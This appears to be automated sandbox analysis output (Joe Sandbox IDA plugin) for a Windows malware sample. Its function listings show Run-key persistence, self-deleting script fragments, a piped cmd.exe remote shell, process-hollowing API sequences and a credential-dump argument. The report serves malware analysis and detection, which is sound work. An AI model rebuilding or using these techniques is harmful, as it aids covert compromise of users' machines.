Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Object$Delete$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID:
API String ID: 2309981249-0
Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction ID: df24513a8eaa63c22d7fa46e62147121e644f16e8022ffed1af92c85ea2f0fcd
Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction Fuzzy Hash: BBC13571548341AFD724DF24DC48B6BBBE9FB89B15F00482DF98997291DB30E904CBA6

Function 0213D687 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02142AB7: TerminateProcess.KERNEL32(00000000,?,0213DA76), ref: 02142AC7
Part of subcall function 02142AB7: WaitForSingleObject.KERNEL32(000000FF,?,0213DA76), ref: 02142ADA

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0213D784
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0213D797

Part of subcall function 0214C658: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0214C777,00000000,00000000,?), ref: 0214C697

ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000000), ref: 0213DA2B
ExitProcess.KERNEL32 ref: 0213DA37

Strings

8SG, xrefs: 0213D736
0qF, xrefs: 0213D99E, 0213D9DF, 0213D8C8, 0213D8F5
hpF, xrefs: 0213D893
while fso.FileExists(", xrefs: 0213D853
exepath, xrefs: 0213D75E
hdF, xrefs: 0213D7B4
On Error Resume Next, xrefs: 0213D820
4qF0qF, xrefs: 0213D9F3, 0213D9FE
dMG, xrefs: 0213D6C2
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0213D729
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0213D6D8
fso.DeleteFolder ", xrefs: 0213D912

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileProcess$CreateDeleteExecuteExitModuleNameObjectShellSingleTerminateWait
String ID: 0qF$4qF0qF$8SG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$dMG$exepath$fso.DeleteFolder "$hdF$hpF$while fso.FileExists("
API String ID: 1359289687-2502588647
Opcode ID: 5ba725d6abd3ecb60e9bbb99b480ebc94d3517df9ea7aa1d7bc553619ff6ad38
Instruction ID: b36a419427cc8eb15b795986c6031d503b91c1ca7cdd8e45fb3e8e9d382aad31
Opcode Fuzzy Hash: 5ba725d6abd3ecb60e9bbb99b480ebc94d3517df9ea7aa1d7bc553619ff6ad38
Instruction Fuzzy Hash: 4191A4312883005FC716FB24ED90AAF739BAFD0710F50442EE94A571A1EF749E49CEA6

Function 02135901 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 278sleepfileprocessCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0213594D

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

__Init_thread_footer.LIBCMT ref: 0213598A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 02135AA6
Sleep.KERNEL32(0000012C,00000093,?), ref: 02135AFE
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02135B23
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02135B50

Part of subcall function 021649D7: __onexit.LIBCMT ref: 021649DD

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 02135C4B
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 02135C65
TerminateProcess.KERNEL32(00000000), ref: 02135C7E

Strings

0lG, xrefs: 02135AC1
kG, xrefs: 02135A42
0lG, xrefs: 02135C94
0lG, xrefs: 02135BBB
0lG, xrefs: 02135BEF
0lG, xrefs: 02135937
cmd.exe, xrefs: 021359B4

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileInit_thread_footerProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$cmd.exe$kG
API String ID: 3407654705-1599548906
Opcode ID: 17955cd63720edcbfcfcd3820b33dd0003a4590f15552dc644d35ad82fd962e8
Instruction ID: cd8dd10ba0c18a895e81f103685a0fedb6954bc52147732286bc2bda7432c983
Opcode Fuzzy Hash: 17955cd63720edcbfcfcd3820b33dd0003a4590f15552dc644d35ad82fd962e8
Instruction Fuzzy Hash: 3F91E371684204BFD712BF24AD40E6E37ABEB48B44F42443EF989971A1DF359C448FA9

Function 0214C282 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0214C29D
_memcmp.LIBVCRUNTIME ref: 0214C2B5
lstrlenW.KERNEL32(?), ref: 0214C2CE
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0214C309
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0214C31C
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0214C360
lstrcmpW.KERNEL32(?,?), ref: 0214C37B
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0214C393
_wcslen.LIBCMT ref: 0214C3A2
FindVolumeClose.KERNEL32(?), ref: 0214C3C2
GetLastError.KERNEL32 ref: 0214C3DA
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0214C407
lstrcatW.KERNEL32(?,?), ref: 0214C420
lstrcpyW.KERNEL32(?,?), ref: 0214C42F
GetLastError.KERNEL32 ref: 0214C437

Strings

?, xrefs: 0214C334

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction ID: 991a40ab56271e98a35e5b3902f930d3731f2c3c2fb4a4108669a7e7cdb28e0a
Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction Fuzzy Hash: C7418071549306EBD720DFA0D848AABB7ECAB88759F00092BF549D2161FF74C948CBD6

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32(?), ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32(?,?), ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Function 0217F694 Relevance: 27.4, APIs: 18, Instructions: 419COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0217F6BB
_free.LIBCMT ref: 0217F726
_free.LIBCMT ref: 0217F74C
_free.LIBCMT ref: 0217F775
_free.LIBCMT ref: 0217F7AD
_free.LIBCMT ref: 0217F7DE
_free.LIBCMT ref: 0217F81F
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0217F8A0
_free.LIBCMT ref: 0217F8B9
_wcschr.LIBVCRUNTIME ref: 0217F8F6
_free.LIBCMT ref: 0217F962
_free.LIBCMT ref: 0217F988
_free.LIBCMT ref: 0217F9B1
_free.LIBCMT ref: 0217F9E6
_free.LIBCMT ref: 0217FA17
_free.LIBCMT ref: 0217FA58
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217FADD
_free.LIBCMT ref: 0217FAF6

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: 71f4ebf169fe83c4e8594e6a6f9a01b4365bf3f1ba66592c1c78d06f0a6ce682
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: AFD15772D84301AFDB24AF749C81B6F7BBAEF84324F14017DE955A7680EB718942CB90

Function 02148356 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 289threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0214847E
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02148496
GetThreadContext.KERNEL32(?,00000000), ref: 021484AC
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 021484D2
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02148554
TerminateProcess.KERNEL32(?,00000000), ref: 02148568
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 021485A8
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02148672
SetThreadContext.KERNEL32(?,00000000), ref: 0214868F
ResumeThread.KERNEL32(?), ref: 0214869C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 021486B3
GetCurrentProcess.KERNEL32(?), ref: 021486BE
TerminateProcess.KERNEL32(?,00000000), ref: 021486D9
GetLastError.KERNEL32 ref: 021486E1

Strings

ntdll, xrefs: 02148388, 021483A7, 021483BB, 021483CF

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ntdll
API String ID: 3275803005-3337577438
Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction ID: 08c437fe88a3cfc98cf0195a5b9f2e255fccadb689d5c6f803429f3a41e0f28c
Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction Fuzzy Hash: 1EA15EB0644301EFDB609F64DD89B6ABBE8FF48709F000829F689D6191DB75D844CF5A

Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

getnameinfo, xrefs: 00414DA2
\ws2_32, xrefs: 00414DFF
IA, xrefs: 00414EDD
freeaddrinfo, xrefs: 00414DB2
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
\wship6, xrefs: 00414E5E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-1941338355
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_wcschr.LIBVCRUNTIME ref: 0044F68F
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
0TG, xrefs: 0041314C
NG, xrefs: 00412F6C
0TG, xrefs: 00413026
NG, xrefs: 004130C1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 5f302daa9e3823d89bc1b7528cea883c2705d6dd97865b91440c8ce755bb17f2
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: 5f302daa9e3823d89bc1b7528cea883c2705d6dd97865b91440c8ce755bb17f2
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Function 0213D2FD Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02142AB7: TerminateProcess.KERNEL32(00000000,?,0213DA76), ref: 02142AC7
Part of subcall function 02142AB7: WaitForSingleObject.KERNEL32(000000FF,?,0213DA76), ref: 02142ADA

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0213D40C
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0213D41F

Part of subcall function 0214BBDF: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,021342E3), ref: 0214BC06

ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000000), ref: 0213D679
ExitProcess.KERNEL32 ref: 0213D680

Strings

hdF, xrefs: 0213D425
while fso.FileExists(", xrefs: 0213D52F
exepath, xrefs: 0213D3E8
On Error Resume Next, xrefs: 0213D4FB
pth_unenc, xrefs: 0213D303
dMG, xrefs: 0213D338
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0213D39F
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0213D34E
fso.DeleteFolder ", xrefs: 0213D5F1
8SG, xrefs: 0213D3C5

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
String ID: 8SG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$dMG$exepath$fso.DeleteFolder "$hdF$pth_unenc$while fso.FileExists("
API String ID: 508158800-2386242888
Opcode ID: fcf9313c08bea653c336e4a04256103770fc28f50cc246febbd765bb9ab429c5
Instruction ID: ea78dbdfd7de420a88f392454c646e8a7946ec19e5594a96ae7b8d4633d0c207
Opcode Fuzzy Hash: fcf9313c08bea653c336e4a04256103770fc28f50cc246febbd765bb9ab429c5
Instruction Fuzzy Hash: 4281B3716883405FC716FB20E850AAF73ABAFD1700F10482EF95A571D1EF749E49CA9A

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

InstallLocation, xrefs: 0041C77C
Publisher, xrefs: 0041C751
InstallDate, xrefs: 0041C790
DisplayName, xrefs: 0041C73C
UninstallString, xrefs: 0041C7A4
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
DisplayVersion, xrefs: 0041C768

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: ee555c49e506066a9e715ff344866794652730a6f0b7e85f07e7a8dd9a1f0250
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: ee555c49e506066a9e715ff344866794652730a6f0b7e85f07e7a8dd9a1f0250
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Function 0213A98D Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0213A9A7

Part of subcall function 0213A8DC: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0213A9B4), ref: 0213A912
Part of subcall function 0213A8DC: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0213A9B4), ref: 0213A921
Part of subcall function 0213A8DC: Sleep.KERNEL32(00002710,?,?,?,0213A9B4), ref: 0213A94E
Part of subcall function 0213A8DC: CloseHandle.KERNEL32(00000000,?,?,?,0213A9B4), ref: 0213A955

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0213A9E3
GetFileAttributesW.KERNEL32(00000000), ref: 0213A9F4
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0213AA0B
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0213AA85

Part of subcall function 0214C6EC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C705

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0213AB8E

Strings

8SG, xrefs: 0213AA69
PG, xrefs: 0213AB6E
pQG, xrefs: 0213A9D8
PG, xrefs: 0213AA13
hdF, xrefs: 0213A9B4
pQG, xrefs: 0213A9C8
8SG, xrefs: 0213AA5E

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$hdF$pQG$pQG$PG$PG
API String ID: 3795512280-4009011672
Opcode ID: 59c09c41cd21390cc78f8e6af8c774b359b592e70f86768ab6e0051a3bd29062
Instruction ID: 5f13615f242825a4b92b383786d928ac19961ba2447179df18bf94b85732ac43
Opcode Fuzzy Hash: 59c09c41cd21390cc78f8e6af8c774b359b592e70f86768ab6e0051a3bd29062
Instruction Fuzzy Hash: 725170612843045FCB1ABB30DD64ABF739BAF94311F00492DEE86A71D1EF749E098E95

Function 02175FBD Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0217602D
_free.LIBCMT ref: 02176043
_free.LIBCMT ref: 02176054
_free.LIBCMT ref: 02176065
_free.LIBCMT ref: 0217607C
GetCPInfo.KERNEL32(?,?), ref: 021760C4

Part of subcall function 021830DB: _free.LIBCMT ref: 02183146

_free.LIBCMT ref: 02176270
_free.LIBCMT ref: 02176283
_free.LIBCMT ref: 02176291
_free.LIBCMT ref: 0217629C
_free.LIBCMT ref: 021762DE
_free.LIBCMT ref: 021762E6
_free.LIBCMT ref: 021762EE
_free.LIBCMT ref: 021762F6
_free.LIBCMT ref: 02176304

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
Instruction ID: 132364ed6bc02b9fb84dd81941b471826893db53aeabea0cfd086a069d4323c0
Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
Instruction Fuzzy Hash: 42B1CE71D40685AFDB10DFA8C880BEEBBF9BF88304F14406DE899A7251DB75A845CF60

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

